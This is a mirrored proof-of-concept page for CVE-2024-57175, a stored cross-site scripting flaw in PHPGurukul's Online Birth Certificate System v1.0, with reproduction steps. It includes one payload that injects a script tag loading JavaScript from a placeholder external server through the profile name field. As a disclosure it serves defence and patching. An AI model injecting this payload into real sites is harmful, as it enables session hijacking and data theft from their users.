CVE-2024-57175 PoC — PHPGurukul Online Birth Certificate System 安全漏洞

Source

https://github.com/Ajmal101/CVE-2024-57175

Associated Vulnerability

Title:PHPGurukul Online Birth Certificate System 安全漏洞 (CVE-2024-57175)
Description:A Stored Cross-Site Scripting (XSS) vulnerability was identified in the PHPGURUKUL Online Birth Certificate System v1.0 via the profile name to /user/certificate-form.php.

Readme

CVE-2024-57175: Stored Cross-Site Scripting (XSS) in PHPGURUKUL Online Birth Certificate System v1.0  

### Description  
A stored Cross-Site Scripting (XSS) vulnerability was identified in PHPGURUKUL Online Birth Certificate System v1.0 in the /user/certificate-form.php page. This vulnerability allows authenticated users to inject malicious XSS scripts into the profile name field, which can lead to code execution on the client side.  

### Steps to Reproduce (PoC)  
1. Navigate to the vulnerable URL as an authenticated user: /user/certificate-form.php.  
2. Modify the profile name with an XSS payload, for example:  
   html
   "><script src="https://severurl"></script>
     

### Impact  
Successful exploitation may allow attackers to execute arbitrary JavaScript on the client side, potentially leading to data theft, session hijacking, or other malicious actions.  

### Credits  
Discovered by Ajmal, January 2025.


###referance
https://github.com/Ajmal101/CVE-2024-57175.git

File Snapshot


 [4.0K]  /data/pocs/7f903e3aed3aa128f6a64bc671ba4fcb68e8150a
└── [ 991]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.

View subscription plans →

Goal Reached Thanks to every supporter — we hit 100%!